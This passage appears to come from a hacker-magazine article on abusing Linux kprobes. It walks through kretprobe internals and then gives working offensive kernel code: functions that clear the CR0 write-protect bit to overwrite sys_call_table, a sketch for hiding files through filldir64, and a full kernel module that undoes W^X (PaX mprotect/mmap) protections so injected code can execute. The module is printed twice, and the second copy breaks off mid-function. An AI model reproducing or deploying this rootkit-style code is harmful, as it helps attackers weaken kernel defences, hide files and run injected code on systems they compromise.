+-- From /usr/src/linux/kernel/kprobes.c --
+
+int __kprobes register_kretprobe(struct kretprobe *rp)
+{
+        int ret = 0;
+        struct kretprobe_instance *inst;
+        int i;
+        void *addr;
+	
+	... <code> ...
+	
+	rp->kp.pre_handler = pre_handler_kretprobe;
+        rp->kp.post_handler = NULL;
+        rp->kp.fault_handler = NULL;
+        rp->kp.break_handler = NULL;
+
+	... <code> ... 
+}
+	NOTE:
+	Notice the rp->kp.pre_handler -- kp is struct kprobe 
+	and the pre_handler is assigned pre_handler_kretprobe.
+
+So when the return probe is hit, pre_handler_kretprobe() will call
+arch_prepare_kretprobe() which saves the original return address and inserts
+the new one:
+
+void __kprobes arch_prepare_kretprobe(struct kretprobe_instance *ri,
+                                      struct pt_regs *regs)
+{
+        unsigned long *sara = stack_addr(regs);
+
+        ri->ret_addr = (kprobe_opcode_t *) *sara;
+
+        /* Replace the return addr with trampoline addr */
+        *sara = (unsigned long) &kretprobe_trampoline;
+}
+
+Notice the last line which sets the return address to the trampoline. The
+trampoline is actually defined in an assembly stub, which for x86 looks
+like this:
+
+asm volatile (
+                        ".global kretprobe_trampoline\n"
+                        "kretprobe_trampoline: \n"
+                        * Skip cs, ip, orig_ax and gs.
+                         * trampoline_handler() will plug in these values
+                         */
+                        "       subl $16, %esp\n"
+                        "       pushl %fs\n"
+                        "       pushl %es\n"
+                        "       pushl %ds\n"
+                        "       pushl %eax\n"
+                        "       pushl %ebp\n"
+                        "       pushl %edi\n"
+                        "       pushl %esi\n"
+                        "       pushl %edx\n"
+                        "       pushl %ecx\n"
+                        "       pushl %ebx\n"
+                        "       movl %esp, %eax\n"
+                        "       call trampoline_handler\n"
+                        /* Move flags to cs */
+                        "       movl 56(%esp), %edx\n"
+                        "       movl %edx, 52(%esp)\n"
+                        /* Replace saved flags with true return address. */
+                        "       movl %eax, 56(%esp)\n"
+                        "       popl %ebx\n"
+                        "       popl %ecx\n"
+                        "       popl %edx\n"
+                        "       popl %esi\n"
+                        "       popl %edi\n"
+                        "       popl %ebp\n"
+                        "       popl %eax\n"
+                        /* Skip ds, es, fs, gs, orig_ax and ip */
+                        "       addl $24, %esp\n"
+                        "       popf\n"
+#endif
+                        "       ret\n");
+}
+
+After the register state is backed up on the stack the stub calls
+trampoline_handler() which essentially executes any return probe
+handlers associated with the kretprobe for the given function. Looking at
+the actual function gives some more insight.
+
+static __used __kprobes void *trampoline_handler(struct pt_regs *regs)
+{
+        struct kretprobe_instance *ri = NULL;
+        struct hlist_head *head, empty_rp;
+        struct hlist_node *node, *tmp;
+        unsigned long flags, orig_ret_address = 0;
+        unsigned long trampoline_address = (unsigned
+long)&kretprobe_trampoline;
+
+        INIT_HLIST_HEAD(&empty_rp);
+        kretprobe_hash_lock(current, &head, &flags);
+        /* fixup registers */
+#ifdef CONFIG_X86_64
+        regs->cs = __KERNEL_CS;
+#else
+        regs->cs = __KERNEL_CS | get_kernel_rpl();
+        regs->gs = 0;
+#endif
+        regs->ip = trampoline_address;
+        regs->orig_ax = ~0UL;
+
+        /*
+         * It is possible to have multiple instances associated with a
+         * given
+         * task either because multiple functions in the call path have
+         * return probes installed on them, and/or more than one
+         * return probe was registered for a target function.
+         *
+         * We can handle this because:
+         *     - instances are always pushed into the head of the list
+         *     - when multiple return probes are registered for the same
+         *       function, the (chronologically) first instance's ret_addr
+         *       will be the real return address, and all the rest will
+         *       point to kretprobe_trampoline.
+         */
+        hlist_for_each_entry_safe(ri, node, tmp, head, hlist) {
+                if (ri->task != current)
+                        /* another task is sharing our hash bucket */
+                        continue;
+
+                if (ri->rp && ri->rp->handler) {
+                        __get_cpu_var(current_kprobe) = &ri->rp->kp;
+                        get_kprobe_ctlblk()->kprobe_status =
+KPROBE_HIT_ACTIVE;
+                        ri->rp->handler(ri, regs);
+                        __get_cpu_var(current_kprobe) = NULL;
+                }
+
+                orig_ret_address = (unsigned long)ri->ret_addr;
+                recycle_rp_inst(ri, &empty_rp);
+
+                if (orig_ret_address != trampoline_address)
+                        /*
+                         * This is the real return address. Any other
+                         * instances associated with this task are for
+                         * other calls deeper on the call stack
+      			*/
+                        break;
+        }
+
+        kretprobe_assert(ri, orig_ret_address, trampoline_address);
+
+        kretprobe_hash_unlock(current, &flags);
+
+        hlist_for_each_entry_safe(ri, node, tmp, &empty_rp, hlist) {
+                hlist_del(&ri->hlist);
+                kfree(ri);
+        }
+        return (void *)orig_ret_address;
+}
+
+The original return address value is returned, and then the
+kretprobe_trampoline stub copies it onto the stack at the right location.
+At which point all of the saved registers are pop'd and restored--resulting
+in returning to the original calling function with the original return
+value. I suppose it doesn't take an over active imagination to see that the
+kretprobe_trampoline stub code can be modified to return a different
+value. This could be done in several ways, however it would exceed
+the scope of hacking purely with kprobes. The arch_prepare_kretprobe()
+function would have to be patched (And it cannot be patched using a kprobe
+sadly) this is because any functions with a __kprobe in the prototype 
+cannot be patched using kprobe hooks themselves.
+
+-- A simple patch within arch_prepare_kretprobe() 
+
+*sara = (unsigned long)&kretprobe_trampoline; 
+
+Could be changed to:
+
+*sara = (unsigned long)&custom_asm_stub;
+
+The problem is that arch_prepare_kretprobe() would have to be modified
+using a technique alternate to kprobes, which is of course easy enough
+but exceeds this papers scope. If you are interested in doing this the
+next section will give you a trick that will be necessary in doing so.
+
+
+----[ 2.5 - A quick stop into modifying read-only kernel segments
+
+If you do feel interested in hijack arch_prepare_kretprobe()
+using a function trampoline, do remember that modern intel CPU's
+have the WRITE_PROTECT bit (cr0.wp) which prevents modifications to
+read-only segments, so anytime you want to modify any data structure
+that resides in .rodata you will need to use the function I provide
+below to modify them. The following types of data structures often
+exist in the kernels text segment:
+
+1. void **sys_call_table
+2. const struct file_operations <fs_fops_name>
+3. const struct vm_ops <vma_vmops_name>
+4. kernel functions
+
+Data structures defined as 'const' will go into the .rodata section
+which is at the end of the text segment, and the kernel code itself 
+generally exist in the .text section of the text segment. Attempting
+writes to these locations will cause kernel freezes/panics/oops.
+
+Some people modify the page table entry data for read-only pages they
+want to modify, but the following functions I have provided are much
+simpler, and an example will be provided below.
+
+/* FUNCTION TO DISABLE WRITE PROTECT BIT IN CPU */
+static void disable_wp(void)
+{
+        unsigned int cr0_value;
+        
+        asm volatile ("movl %%cr0, %0" : "=r" (cr0_value));
+        
+        /* Disable WP */
+        cr0_value &= ~(1 << 16);
+        
+        asm volatile ("movl %0, %%cr0" :: "r" (cr0_value));
+
+}
+        
+/* FUNCTION TO RE-ENABLE WRITE PROTECT BIT IN CPU */
+static void enable_wp(void)
+{
+        unsigned int cr0_value;
+
+        asm volatile ("movl %%cr0, %0" : "=r" (cr0_value));
+
+        /* Enable WP */
+        cr0_value |= (1 << 16);
+
+        asm volatile ("movl %0, %%cr0" :: "r" (cr0_value));
+
+}
+
+So if you wanted to modify a kernel function pointer that exists within
+the text segment (If it is declared const) -- I.E the sys_call_table:
+
+	disable_wp();
+	sys_call_table[__NR_write] = (void *)n_sys_write;
+	enable_wp(); 
+
+Or assuming you have a function that hijacks arch_prepare_kretprobe() using
+the method discussed here [3]
+
+	disable_wp();
+	hijack_arch_prepare_kretprobe();
+	enable_wp();
+
+
+You get the idea. But since we've fallen a bit off track lets move into
+the next section which is actually more relative to the paper.
+
+
+----[ 2.6 - An idea for a kretprobe implementation for hackers 
+
+
+The primary restriction in patching the kernels should be obvious by now.
+We CANNOT modify the return value in return probes (kretprobes). If someone
+felt so inclined, they could (in an LKM) implement something very similar to
+the kretprobe implementation. This would allow us to instrument the kernel
+using kprobes and modify the return value -- therefore easily patching 
+functions like filldir64 which would allow us to simply use our special
+kretprobe implementation to 'return 0' if the 'char *d_name' matched a 
+file we wanted to hide. 
+
+If the reader studies /usr/src/linux/kernel/kprobes.c after reading the
+above section on kretprobe implementation, it becomes apparent that a
+more flexible kretprobe implementation could be designed. This is hardly
+non-trivial if the reader followed this paper in its entirety. I simply
+did not have enough time to design this feature -- a kretprobe for hackers
+that allows control of the return value. Lets call this feature 'rpe' 
+(Return probe elite) the BASIC schematics would look like:
+
+int register_rpe(struct kretprobe *rp)
+{	
+	   
+	  ... <code> ...
+	   rp->kp.pre_handler = pre_handler_rpe;
+	   ... <code> ...
+}
+
+static int pre_handler_rpe(struct kprobe *p,
+                                 struct pt_regs *regs)
+{
+	arch_prepare_rpe(regs);
+
+}
+
+
+void arch_prepare_rpe(struct pt_regs *regs)
+{
+
+	unsigned long *ret = stack_addr(regs);
+
+        ret_addr = (kprobe_opcode_t *) *sara;
+
+        /* Replace the return addr with trampoline addr */
+        *ret = (unsigned long) &rpe_trampoline;
+}
+
+rpe_trampoline could be either an asm stub or an actual
+function -- either way you would want to backup the registers
+before calling your handler that does what you want --
+to process data and ultimately return whatever value you want
+For instance:
+    __asm__ ("movl $val, %eax\n"
+	     "push $ret_addr\n"
+	     "ret");
+
+Since I did not provide an implementation for a more flexible
+kretprobe, the reader may be interested in doing so. Once I
+get an opportunity I intend on writing an LKM patch for one
+and releasing it.
+
+
+---[ 3 - Patch to unpatch W^X (mprotect/mmap restrictions)
+
+Lets move on to a couple of other patches using the existing
+kprobe features to show some usefulness other than a file hiding
+mechanism. These two patches will aim at disabling the W^X feature
+that is enabled in kernels -- PaX for instance calls this mprotect
+restrictions. W^X is to say that an mmap segment cannot be created
+or modified to be both write+execute. The patches below give us
+two benefits:
+
+1. On systems with the NX (no_exec_pages) bit set, we will be able
+to do things like mark the data segment as executable and inject
+code there for execution using ptrace.
+
+2. Many ELF protectors (Burneye, Shiva, Elfcrypt, etc.) store the
+encrypted executable in the text segment of the stub/loading code
+and to decrypt part of a programs own text, would be considered self
+modifying code -- W^X prevents this -- so with our Anti-W^X patch
+we can use our ELF Protectors, and make segments such as the stack
+and data segment, once again, executable on systems with the NX bit set
+where mprotect/mmap restrictions really make a difference.
+
+An important note is that due to the design nature of the following
+patch, we cannot change the return values; so mprotect and mmap
+will both give a return value that says they failed-- don't exit
+based on error checking because your write+execute mmap and mprotect
+attempts actually succeed. To test you can look at /proc/pid/maps
+of the given process.			
+
+-- tested on 2.6.18 -- 
+
+On modern systems simply change regs->eax to regs->ax in the two necessary spots.
+Also exporting the module license to GPL is not necessary to use kprobes on modern
+systems.
+
+#include <linux/kernel.h>
+#include <linux/module.h>
+#include <linux/kprobes.h>
+#include <linux/mm.h>
+#include <linux/fs.h>
+#include <linux/file.h>
+
+
+#define PROT_READ       0x1             /* Page can be read.  */
+#define PROT_WRITE      0x2             /* Page can be written.  */
+#define PROT_EXEC       0x4             /* Page can be executed.  */
+#define PROT_NONE       0x0             /* Page can not be accessed.  */
+#define MAP_FIXED       0x10   		
+
+#define MAP_ANONYMOUS   0x20            /* don't use a file */
+#define MAP_GROWSDOWN   0x0100          /* stack-like segment */
+#define MAP_DENYWRITE   0x0800          /* ETXTBSY */
+#define MAP_EXECUTABLE  0x1000          /* mark it as an executable */
+
+/* 
+ * It is preferable to write a script that gets
+ * kallsyms_lookup_name() from System.map and then
+ * passes it as a module parameter, but in this example
+ * we just look it up and assign it our selves, so
+ * make sure to change the address.
+ */
+unsigned long (*_kallsyms_lookup_name)(char *) = (void *)0xc043e5d0; // change this
+
+unsigned long (*_get_unmapped_area)(struct file *file, unsigned long addr, unsigned long len,
+                unsigned long pgoff, unsigned long flags);
+
+	
+static struct 
+{
+	int assign_wx;
+	unsigned long start;
+	size_t len;
+	long prot;
+} mprotect;
+
+MODULE_LICENSE("GPL");
+
+asmlinkage int kp_sys_mprotect(unsigned long start, size_t len, long prot)
+{
+        struct vm_area_struct *vma = current->mm->mmap;
+		
+	mprotect.assign_wx = 0;
+	mprotect.start = start;
+	mprotect.prot = prot;
+
+	/* This doesn't concern us */
+        if (!(prot & PROT_EXEC) && !(prot & PROT_WRITE))
+                goto out;
+
+        down_write(&current->mm->mmap_sem);
+        
+	/* Get vma for start memory area */
+        vma = find_vma(current->mm, start);
+	if (!vma)
+		goto free_sem;
+
+        if (prot & (PROT_WRITE|PROT_EXEC))
+	{
+		mprotect.assign_wx++;
+		goto free_sem;
+	}
+
+	if (prot & PROT_WRITE)
+        {
+	        mprotect.assign_wx++;
+        	goto free_sem;
+	}
+	
+        if (prot & PROT_EXEC)
+	{
+		mprotect.assign_wx++;
+		goto free_sem;
+	}
+	
+	free_sem:
+	up_write(&current->mm->mmap_sem);
+	
+	out:
+	jprobe_return();
+	return 0;
+}
+
+/*
+ before the following function is executed, a W^X patch such as PaX
+ mprotect/mmap restrictions, will have code such as:
+ if ((vm_flags & (VM_WRITE | VM_EXEC)) != VM_EXEC)
+                       vm_flags &= ~(VM_EXEC | VM_MAYEXEC);
+               else
+                       vm_flags &= ~(VM_WRITE | VM_MAYWRITE);
+ 
+ But our return probe gets the last say in the matter. mprotect
+ will return like it failed (With a positive value) but the VMA's
+ or memory maps will be both write+execute, just make sure that
+ you don't error checking then exit if mprotect or mmap fail 
+ because they will return failed values.
+*/
+
+static int rp_mprotect(struct kretprobe_instance *ri, struct pt_regs *regs)
+{
+	struct vm_area_struct *vma;
+
+	if (!mprotect.assign_wx)
+		goto out;
+	
+	down_write(&current->mm->mmap_sem);
+
+        /* Get vma for start memory area */
+        vma = find_vma(current->mm, mprotect.start);
+        if (!vma)
+                goto sem_out;
+
+	if (mprotect.prot & PROT_EXEC)
+	{
+		vma->vm_flags |= VM_MAYEXEC;
+		vma->vm_flags |= VM_EXEC;
+	}
+	
+	if (mprotect.prot & PROT_WRITE)
+	{
+		vma->vm_flags |= VM_MAYWRITE;
+		vma->vm_flags |= VM_WRITE;
+	}
+	
+	sem_out:
+	up_write(&current->mm->mmap_sem);
+		
+
+	out:
+	return 0;
+}
+
+struct 
+{
+        unsigned long addr;
+#define MMAP_CLEAN 0
+#define MMAP_DIRTY 1
+        int mmap_prot_state;
+        unsigned int len;
+} do_mmap_data;
+
+/* Return probe code for sys_mmap2 */
+static int rp_mmap(struct kretprobe_instance *ri, struct pt_regs *regs)
+{
+        struct vm_area_struct *vma = current->mm->mmap;
+        
+        /* we are assuming the default function to get an unmapped region is arch_get_unmapped_topdown() */
+        if (do_mmap_data.addr - regs->eax == do_mmap_data.len)
+                do_mmap_data.addr = regs->eax;
+        else
+		goto out; // pretty unlikely
+
+        switch(do_mmap_data.mmap_prot_state)
+        {
+                case MMAP_CLEAN:
+                        break;
+                case MMAP_DIRTY: // lets undo the work of the W^X patch :)
+                        down_write(&current->mm->mmap_sem);
+                        vma = find_vma(current->mm, do_mmap_data.addr);
+                        if (!vma)
+                                break;
+			printk("Found vma's and setting all writes and exec possibilities\n");
+                        vma->vm_flags |= (VM_EXEC | VM_MAYEXEC);
+                        vma->vm_flags |= (VM_WRITE | VM_MAYWRITE);
+                        up_write(&current->mm->mmap_sem);
+                        break;
+        }
+	out:
+	return 0;
+}
+
+asmlinkage long kp_sys_mmap2(unsigned long addr, unsigned long len, unsigned long prot, unsigned long flags,
+                          unsigned long fd, unsigned long pgoff)
+{
+
+        struct file *file = NULL;
+	
+	printk("In sys_mmap2\n");
+        do_mmap_data.len = len;
+
+        /* We emulate a combination of sys_mmap2 and do_mmap_pgoff */
+        
+	/* This is the easiest scenario */
+	/* because we know the mmap addr */
+        if (flags & MAP_FIXED)
+        {
+		printk("MAP_FIXED\n");
+                do_mmap_data.addr = addr;
+                if ((prot & PROT_EXEC) && (prot & PROT_WRITE))
+                        do_mmap_data.mmap_prot_state = MMAP_DIRTY;
+                else
+                        do_mmap_data.mmap_prot_state = MMAP_CLEAN;
+                goto out;
+        }
+
+        flags &= ~(MAP_EXECUTABLE | MAP_DENYWRITE);
+        if (!(flags & MAP_ANONYMOUS)) 
+        {
+                file = fget(fd);
+                if (!file)
+                        goto out;
+        }
+        
+        /* mimick do_mmap_pgoff to get the linear range */
+        down_write(&current->mm->mmap_sem);
+
+        if (file) 
+        {
+                if (!file->f_op || !file->f_op->mmap)
+                        goto sem_out;
+        }
+
+        if (!len)
+                goto sem_out;
+
+        len = PAGE_ALIGN(len);
+        if (!len || len > TASK_SIZE)
+                goto sem_out;
+
+        if ((pgoff + (len >> PAGE_SHIFT)) < pgoff)
+                goto sem_out;
+
+        /* when the real sys_mmap2/do_mmap_pgoff are called 
+         * they will get the next linear range 
+	 * which will be at do_mmap_data.addr - do_mmap_data.len 
+         * This relies on get_unmapped_area() calling arch_get_unmapped_area_topdown() 
+	 */
+	printk("get_unmapped_area call\n");
+        addr = _get_unmapped_area(file, addr, len, 0, flags);
+        printk("addr: 0x%lx\n", addr);
+	do_mmap_data.addr = addr;
+
+        if ((prot & PROT_EXEC) && (prot & PROT_WRITE))
+                do_mmap_data.mmap_prot_state = MMAP_DIRTY;
+	else
+               	do_mmap_data.mmap_prot_state = MMAP_CLEAN;
+                
+        sem_out:
+        up_write(&current->mm->mmap_sem);
+        out:
+        jprobe_return();
+        return 0;
+
+}
+
+static struct jprobe sys_mmap2_jprobe = 
+{
+        .entry = (kprobe_opcode_t *)kp_sys_mmap2
+};
+
+static struct jprobe sys_mprotect_jprobe =
+{
+	.entry = (kprobe_opcode_t *)kp_sys_mprotect
+};
+
+static struct kretprobe mprotect_kretprobe = 
+{
+        .handler  = rp_mprotect,
+	.maxactive = 1 // this code isn't really SMP reliable
+};
+
+static struct kretprobe mmap_kretprobe =
+{
+        .handler = rp_mmap,
+        .maxactive = 1 // this code isn't really SMP reliable
+};
+
+
+void exit_module(void)
+{
+	unregister_jprobe(&sys_mmap2_jprobe);
+        unregister_jprobe(&sys_mprotect_jprobe);
+
+        unregister_kretprobe(&mprotect_kretprobe);
+        unregister_kretprobe(&mmap_kretprobe);
+}
+
+int init_module(void)
+{
+	int j = 0, k = 0;
+
+	_get_unmapped_area = (void *)_kallsyms_lookup_name("arch_get_unmapped_area_topdown");
+	
+	sys_mmap2_jprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mmap2");
+	/* Register our jprobes */
+	if (register_jprobe(&sys_mmap2_jprobe) < 0)
+		goto jfail;
+	j++;
+
+	sys_mprotect_jprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mprotect");
+	if (register_jprobe(&sys_mprotect_jprobe) < 0)
+		goto jfail;
+	
+	mprotect_kretprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mprotect");
+	/* Register our kretprobes */
+	if (register_kretprobe(&mprotect_kretprobe) < 0)
+		goto kfail;
+	k++;
+	
+	mmap_kretprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mmap2");
+	if (register_kretprobe(&mmap_kretprobe) < 0)
+		goto kfail;
+	
+	return 0;
+
+	jfail:
+		
+		printk(KERN_EMERG "register_jprobe failed for %s\n", (!j ? "sys_mmap2" : "sys_mprotect"));
+	kfail:
+		printk(KERN_EMERG "register_kretprobe failed for %s\n", (!k ? "mprotect" : "mmap"));
+
+	return -1;
+}
+
+	
+module_exit(exit_module);
+
+--- end of code ---
+
+
+---[ 4 - Notes on rootkit detection for kprobes
+
+If a kernel rootkit is designed soley using kprobes and properly hides
+itself from the kprobe entries in sysfs, then a rootkit detection program
+can still easily detect what kernel functions have been hooked. I will
+leave this obvious solution to anyone interested in adding this feature
+to their detectors but the answer lies in this paper as well as the kprobe
+documentation.
+
+
+---[ 5 - Summing it all up
+
+We have seen that the kprobe interface, which is primarily implemented
+for kernel debugging can be used to instrument the kernel in some
+interesting ways. We have explored kprobes strengths, weaknesses, and provided
+several examples of weakening the kernel by patching it using jprobe and
+kretprobe techniques. We also went over some ideas for implementing a more
+hacker friendly kretprobe implementation (Although we did not provide one).
+
+It is also important to mention to people who are engineering security code
+that kprobes can also be used to debug kernel code, as well as install simple
+patches for hardening the kernel. But phrack isn't about that, so patches
+to harden the kernel were not included -- just know that it is possible.
+
+
+---[ 6 - Greetz
+
+kad - thanks for encouraging me to write this, and being cool guy with
+priceless skills and good advice.
+
+Silvio - My initial inspiration for kernel and ELF hacking all started with you.
+You've been a good friend and mentor, many many thanks.
+
+chrak - My long time friend and occasional coding partner. 13yrs ago this guy
+helped me write my first backdoor program for Linux.
+
+nynex - I owe you for hosting my stuff and being a good friend.
+
+mayhem - For writing some really cool ELF code and being an inspiration.
+
+grugq - Your original AF work has been an inspiration as well.
+
+halfdead - For knowing everything about the universe and our realm *literally*
+
+jimjones (UNIX Terrorist) - you will be getting a copy of this soon, word.
+
+All of the digitalnerds -- especially halfdead, scrippie, pronsa and abh.
+
+#bitlackeys on EFnet, a small and strange little channel with people whom
+I've been friends with for years.
+
+#formal on a secret network with extremely smart people and good conversation.
+
+RuxCon folk are pretty much all awesome too, thanks.
+
+
+---[ 7 - References
+
+Please note that I did not use any references other than code and official
+documentation for this paper, but the following papers are quite relevant and
+since I have read them (along with many other great papers) they all play a
+role in my collective knowledge of kernel malware and rootkit exploration.
+
+[1] kad - Handling interrupt descriptor table for fun and profit
+          http://www.phrack.org/issues.html?issue=59&id=4#article
+
+[2] Halfdead - Mystifying the debugger for ultimate stealthness 
+               http://www.phrack.org/issues.html?issue=65&id=8#article 
+
+[3] Silvio - Kernel function hijacking (Function trampolines)
+             http://vxheavens.com/lib/vsc08.html 
+
+
+---[ 8 - Code
+
+/*
+	Tested on 2.6.18 kernel, on modern kernels change regs->eax to regs->ax.	
+	From the ElfMaster, 2010.
+
+Makefile:
+
+obj-m += w_plus_x.o
+
+MODULES = w_plus_x.ko
+
+all: clean $(MODULES)
+
+$(MODULES):
+        make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
+
+clean:
+        rm -f *.o *.ko Module.markers Module.symvers w_plus_x*.mod.c modules.order
+
+
+*/
+
+
+#include <linux/kernel.h>
+#include <linux/module.h>
+#include <linux/kprobes.h>
+#include <linux/mm.h>
+#include <linux/fs.h>
+#include <linux/file.h>
+
+
+#define PROT_READ       0x1             /* Page can be read.  */
+#define PROT_WRITE      0x2             /* Page can be written.  */
+#define PROT_EXEC       0x4             /* Page can be executed.  */
+#define PROT_NONE       0x0             /* Page can not be accessed.  */
+#define MAP_FIXED       0x10   		
+
+#define MAP_ANONYMOUS   0x20            /* don't use a file */
+#define MAP_GROWSDOWN   0x0100          /* stack-like segment */
+#define MAP_DENYWRITE   0x0800          /* ETXTBSY */
+#define MAP_EXECUTABLE  0x1000          /* mark it as an executable */
+
+/* 
+ * It is preferable to write a script that gets
+ * kallsyms_lookup_name() from System.map and then
+ * passes it as a module parameter, but in this example
+ * we just look it up and assign it our selves, so
+ * make sure to change the address.
+ */
+unsigned long (*_kallsyms_lookup_name)(char *) = (void *)0xc043e5d0; // change this
+
+unsigned long (*_get_unmapped_area)(struct file *file, unsigned long addr, unsigned long len,
+                unsigned long pgoff, unsigned long flags);
+
+	
+static struct 
+{
+	int assign_wx;
+	unsigned long start;
+	size_t len;
+	long prot;
+} mprotect;
+
+MODULE_LICENSE("GPL");
+
+asmlinkage int kp_sys_mprotect(unsigned long start, size_t len, long prot)
+{
+        struct vm_area_struct *vma = current->mm->mmap;
+		
+	mprotect.assign_wx = 0;
+	mprotect.start = start;
+	mprotect.prot = prot;
+
+	/* This doesn't concern us */
+        if (!(prot & PROT_EXEC) && !(prot & PROT_WRITE))
+                goto out;
+
+        down_write(&current->mm->mmap_sem);
+        
+	/* Get vma for start memory area */
+        vma = find_vma(current->mm, start);
+	if (!vma)
+		goto free_sem;
+
+        if (prot & (PROT_WRITE|PROT_EXEC))
+	{
+		mprotect.assign_wx++;
+		goto free_sem;
+	}
+
+	if (prot & PROT_WRITE)
+        {
+	        mprotect.assign_wx++;
+        	goto free_sem;
+	}
+	
+        if (prot & PROT_EXEC)
+	{
+		mprotect.assign_wx++;
+		goto free_sem;
+	}
+	
+	free_sem:
+	up_write(&current->mm->mmap_sem);
+	
+	out:
+	jprobe_return();
+	return 0;
+}
+
+/*
+ before the following function is executed, a W^X patch such as PaX
+ mprotect/mmap restrictions, will have code such as:
+ if ((vm_flags & (VM_WRITE | VM_EXEC)) != VM_EXEC)
+                       vm_flags &= ~(VM_EXEC | VM_MAYEXEC);
+               else
+                       vm_flags &= ~(VM_WRITE | VM_MAYWRITE);
+ 
+ But our return probe gets the last say in the matter. mprotect
+ will return like it failed (With a positive value) but the VMA's
+ or memory maps will be both write+execute, just make sure that
+ you don't error checking then exit if mprotect or mmap fail 
+ because they will return failed values.
+*/
+
+static int rp_mprotect(struct kretprobe_instance *ri, struct pt_regs *regs)
+{
+	struct vm_area_struct *vma;
+
+	if (!mprotect.assign_wx)
+		goto out;
+	
+	down_write(&current->mm->mmap_sem);
+
+        /* Get vma for start memory area */
+        vma = find_vma(current->mm, mprotect.start);
+        if (!vma)
+                goto sem_out;
+
+	if (mprotect.prot & PROT_EXEC)
+	{
+		vma->vm_flags |= VM_MAYEXEC;
+		vma->vm_flags |= VM_EXEC;
+	}
+	
+	if (mprotect.prot & PROT_WRITE)
+	{
+		vma->vm_flags |= VM_MAYWRITE;
+		vma->vm_flags |= VM_WRITE;
+	}
+	
+	sem_out:
+	up_write(&current->mm->mmap_sem);
+		
+
+	out:
+	return 0;
+}
+
+struct 
+{
+        unsigned long addr;
+#define MMAP_CLEAN 0
+#define MMAP_DIRTY 1
+        int mmap_prot_state;
+        unsigned int len;
+} do_mmap_data;
+
+/* Return probe code for sys_mmap2 */
+static int rp_mmap(struct kretprobe_instance *ri, struct pt_regs *regs)
+{
+        struct vm_area_struct *vma = current->mm->mmap;
+        
+        /* we are assuming the default function to get an unmapped region is arch_get_unmapped_topdown() */
+        if (do_mmap_data.addr - regs->eax == do_mmap_data.len)
+                do_mmap_data.addr = regs->eax;
+        else
+		goto out; // pretty unlikely
+
+        switch(do_mmap_data.mmap_prot_state)
+        {
+                case MMAP_CLEAN:
+                        break;
+                case MMAP_DIRTY: // lets undo the work of the W^X patch :)
+                        down_write(&current->mm->mmap_sem);
+                        vma = find_vma(current->mm, do_mmap_data.addr);
+                        if (!vma)
+                                break;
+			printk("Found vma's and setting all writes and exec possibilities\n");
+                        vma->vm_flags |= (VM_EXEC | VM_MAYEXEC);
+                        vma->vm_flags |= (VM_WRITE | VM_MAYWRITE);
+                        up_write(&current->mm->mmap_sem);
+                        break;
+        }
+	out:
+	return 0;
+}
+
+asmlinkage long kp_sys_mmap2(unsigned long addr, unsigned long len, unsigned long prot, unsigned long flags,
+                          unsigned long fd, unsigned long pgoff)
+{
+
+        struct file *file = NULL;
+	
+	printk("In sys_mmap2\n");
+        do_mmap_data.len = len;
+
+        /* We emulate a combination of sys_mmap2 and do_mmap_pgoff */
+        
+	/* This is the easiest scenario */
+	/* because we know the mmap addr */
+        if (flags & MAP_FIXED)
+        {
+		printk("MAP_FIXED\n");
+                do_mmap_data.addr = addr;
+                if ((prot & PROT_EXEC) && (prot & PROT_WRITE))
+                        do_mmap_data.mmap_prot_state = MMAP_DIRTY;
+                else
+                        do_mmap_data.mmap_prot_state = MMAP_CLEAN;
+                goto out;
+        }
+
+        flags &= ~(MAP_EXECUTABLE | MAP_DENYWRITE);
+        if (!(flags & MAP_ANONYMOUS)) 
+        {
+                file = fget(fd);
+                if (!file)
+                        goto out;
+        }
+        
+        /* mimick do_mmap_pgoff to get the linear range */
+        down_write(&current->mm->mmap_sem);
+
+        if (file) 
+        {
+                if (!file->f_op || !file->f_op->mmap)
+                        goto sem_out;
+        }
+
+        if (!len)
+                goto sem_out;
+
+        len = PAGE_ALIGN(len);
+        if (!len || len > TASK_SIZE)
+                goto sem_out;
+
+        if ((pgoff + (len >> PAGE_SHIFT)) < pgoff)
+                goto sem_out;
+
+        /* when the real sys_mmap2/do_mmap_pgoff are called 
+         * they will get the next linear range 
+	 * which will be at do_mmap_data.addr - do_mmap_data.len 
+         * This relies on get_unmapped_area() calling arch_get_unmapped_area_topdown() 
+	 */
+	printk("get_unmapped_area call\n");
+        addr = _get_unmapped_area(file, addr, len, 0, flags);
+        printk("addr: 0x%lx\n", addr);
+	do_mmap_data.addr = addr;
+
+        if ((prot & PROT_EXEC) && (prot & PROT_WRITE))
+                do_mmap_data.mmap_prot_state = MMAP_DIRTY;
+	else
+               	do_mmap_data.mmap_prot_state = MMAP_CLEAN;
+                
+        sem_out:
+        up_write(&current->mm->mmap_sem);
+        out:
+        jprobe_return();
+        return 0;
+
+}
+
+static struct jprobe sys_mmap2_jprobe = 
+{
+        .entry = (kprobe_opcode_t *)kp_sys_mmap2
+};
+
+static struct jprobe sys_mprotect_jprobe =
+{
+	.entry = (kprobe_opcode_t *)kp_sys_mprotect
+};
+
+static struct kretprobe mprotect_kretprobe = 
+{
+        .handler  = rp_mprotect,
+	.maxactive = 1 // this code isn't really SMP reliable
+};
+
+static struct kretprobe mmap_kretprobe =
+{
+        .handler = rp_mmap,
+        .maxactive = 1 // this code isn't really SMP reliable
+};
+
+
+void exit_module(void)
+{
+	unregister_jprobe(&sys_mmap2_jprobe);
+        unregister_jprobe(&sys_mprotect_jprobe);
+
+        unregister_kretprobe(&mprotect_kretprobe);
+        unregister_kretprobe(&mmap_kretprobe);
+}
+
+int init_module(void)
+{
+	int j = 0, k = 0;
+
+	_get_unmapped_area = (void *)_kallsyms_lookup_name("arch_get_unmapped_area_topdown");
+	
+	sys_mmap2_jprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mmap2");
+	/* Register our jprobes */
+	if (register_jprobe(&sys_mmap2_jprobe) < 0)
+		goto jfail;
+	j++;
+
+	sys_mprotect_jprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mprotect");
+	if (register_jprobe(&sys_mprotect_jprobe) < 0)
+		goto jfail;
+	
+	mprotect_kretprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mprotect");
+	/* Register our kretprobes */
+	if (register_kretprobe(&mprotect_kretprobe) < 0)
+		goto kfail;
+	k++;
+	
+	mmap_kretprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mmap2");
